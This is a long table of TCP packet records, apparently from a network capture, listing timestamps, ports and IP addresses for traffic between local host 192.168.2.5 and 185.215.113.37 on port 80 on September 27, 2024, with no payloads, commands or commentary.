Sep 27, 2024 04:14:15.016155005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016182899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016185999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016197920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016216993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016232014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016248941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016293049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016295910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016305923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016328096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016357899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016362906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016381979 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016391993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016422033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016448975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016448975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016454935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016473055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016486883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016504049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016519070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016549110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016557932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016557932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016582966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016594887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016613960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016633987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016648054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016663074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016678095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016710043 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016721010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016721010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016741037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016772985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016782999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016782999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016803980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016839027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016848087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016848087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016865969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016885996 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016897917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016923904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016931057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016963005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016973019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016973019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016993999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.017026901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.017039061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.017039061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.017059088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.017101049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.017101049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.045828104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045861959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045872927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045883894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045883894 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.045901060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045912027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.045926094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.045926094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046000957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046005011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046015024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046025038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046036005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046044111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046055079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046061993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046061993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046088934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046108007 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046195030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046205997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046216965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046225071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046235085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046246052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046266079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046266079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046288013 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046327114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046338081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046420097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046442986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046453953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046464920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046475887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046487093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046497107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046505928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.046518087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046518087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046530962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.046570063 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.047694921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047754049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047765017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047766924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.047827005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.047853947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047863960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047875881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047887087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047903061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.047955990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.047955990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.047955990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.048047066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048063040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048082113 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048094034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048095942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.048104048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048114061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.048140049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.048140049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.048181057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106323957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106353998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106364012 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106442928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106451988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106462955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106472969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106527090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106539965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106539965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106585979 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106610060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106618881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106646061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106653929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106657028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106668949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106673956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106703043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106703043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106735945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106748104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106801033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106862068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106872082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106883049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106930971 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106930971 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.106959105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106967926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106978893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.106988907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107018948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107018948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107045889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107057095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107093096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107111931 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107120037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107130051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107197046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107228041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107237101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107248068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107258081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107281923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107281923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107311010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107372046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107382059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107397079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107405901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107418060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107429981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107429981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107456923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107507944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107553005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107613087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107625961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107635975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107646942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107656956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107665062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107666969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107677937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107685089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107691050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107711077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107711077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107773066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107840061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107928038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107929945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107938051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107948065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107956886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107965946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107975006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.107980967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.107980967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108011007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108021021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108031034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108040094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108042955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108042955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108050108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108059883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108068943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108100891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108376026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108386040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108401060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108409882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108411074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108411074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108536959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108601093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108612061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108620882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108630896 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108642101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108650923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108660936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108664036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108664036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108670950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108681917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108691931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108701944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108704090 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108704090 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108869076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108870029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.108900070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.108952045 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.109011889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109021902 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109030962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109041929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109051943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109061003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109071016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109076977 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.109076977 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.109086990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109096050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.109107018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.109107018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.109141111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138252974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138273001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138283014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138322115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138371944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138382912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138391972 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138401985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138410091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138410091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138454914 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138477087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138519049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138535023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138545990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138554096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138565063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138573885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138576984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138586044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138597012 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138622046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138643026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138643026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138748884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138760090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138784885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138793945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138797045 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138803959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138813019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138839960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138849974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138860941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138870001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138880968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.138887882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138887882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.138923883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140151024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140161037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140171051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140201092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140204906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140224934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140234947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140259981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140259981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140304089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140315056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140326023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140335083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140347958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140369892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140499115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140508890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140518904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140528917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140538931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140551090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140566111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140566111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140599966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.140605927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.140633106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.198796034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198815107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198827028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198870897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198882103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198893070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198971033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198982000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.198996067 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199047089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.199071884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.199081898 CEST	80	49704	185.215.113.37	192.168.2.5
